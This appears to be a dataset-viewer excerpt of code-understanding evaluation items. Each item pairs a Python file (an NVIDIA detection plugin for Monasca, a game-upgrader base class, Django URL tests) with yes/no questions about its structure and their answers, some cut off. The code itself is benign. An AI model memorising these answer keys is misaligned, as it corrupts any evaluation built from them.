import logging
import subprocess
import monasca_setup.agent_config
import monasca_setup.detection
LOG = logging.getLogger(__name__)
class NvidiaDetect(monasca_setup.detection.Plugin):
    """Detects and configures nVidia plugin."""

    def _detect(self):
        """Set ``self.available`` iff lshw reports an nVidia display adapter."""
        self.available = False
        # check_output returns bytes on Python 3; decode before the substring
        # test, since `'nvidia' in <bytes>` raises TypeError there. On
        # Python 2 the decode is a harmless str -> unicode conversion.
        output = subprocess.check_output(
            ["lshw", "-C", "display"]).decode('utf-8', 'replace')
        if 'nvidia' not in output.lower():
            LOG.info('No nVidia hardware detected.')
            return
        self.available = True

    def build_config(self):
        """Return the monasca agent plugin config for the nvidia check."""
        config = monasca_setup.agent_config.Plugins()
        config['nvidia'] = {
            'init_config': None,
            'instances': [{'name': 'nvidia_stats'}]}
        return config
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | stackhpc_monasca_agent_plugins/detection/nvidia.py | stackhpc/monasca-agent-plugins |
"""
Upgrade custom's game dir to the latest version.
"""
from utils import compare_version
class BaseUpgrader(object):
    """
    Upgrade a game dir from the version in [<from_version>, <to_version>) to version
    <target_version>.
    """
    # Lowest game version this upgrader accepts (inclusive).
    from_min_version = (0, 0, 0)
    # Upper version bound this upgrader accepts (exclusive).
    from_max_version = (0, 0, 0)
    # Version produced by the upgrade; None means the latest version.
    target_version = None

    def upgrade_game(self, game_dir, game_template, muddery_lib):
        """
        Upgrade a game. Subclasses override this hook; the base does nothing.

        Args:
            game_dir: (string) the game dir to be upgraded.
            game_template: (string) the game template used to upgrade the game dir.
            muddery_lib: (string) muddery's dir
        """
        pass

    def upgrade_data(self, data_path, game_template, muddery_lib):
        """
        Upgrade game data. Subclasses override this hook; the base does nothing.

        Args:
            data_path: (string) the data path to be upgraded.
            game_template: (string) the game template used to upgrade the game dir.
            muddery_lib: (string) muddery's dir
        """
        pass

    def can_upgrade(self, game_ver):
        """Return True when ``game_ver`` (a version-number sequence) lies in
        [from_min_version, from_max_version)."""
        # Inclusive lower bound: reject anything below from_min_version.
        if compare_version(game_ver, self.from_min_version) == -1:
            return False
        # Exclusive upper bound: accept only versions below from_max_version.
        return compare_version(game_ver, self.from_max_version) == -1
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"a... | 3 | muddery/server/upgrader/base_upgrader.py | MarsZone/DreamLand |
from django.test import TestCase
from django.urls import resolve, reverse
from . import views
class TestMapUrl(TestCase):
    """Verify that each map.* URL name resolves to the expected view function."""

    def test_map_check_resloved(self):
        # reverse() builds the URL from its name; resolve() maps it back to a view.
        url = reverse('map.check')
        self.assertEqual(resolve(url).func, views.check)

    def test_map_fetch_resloved(self):
        url = reverse('map.fetch')
        self.assertEqual(resolve(url).func, views.fetch)

    def test_map_test_resloved(self):
        url = reverse('map.test')
        self.assertEqual(resolve(url).func, views.test)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answ... | 3 | map/tests.py | Code-and-Response/ISAC-SIMO-Repo-2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.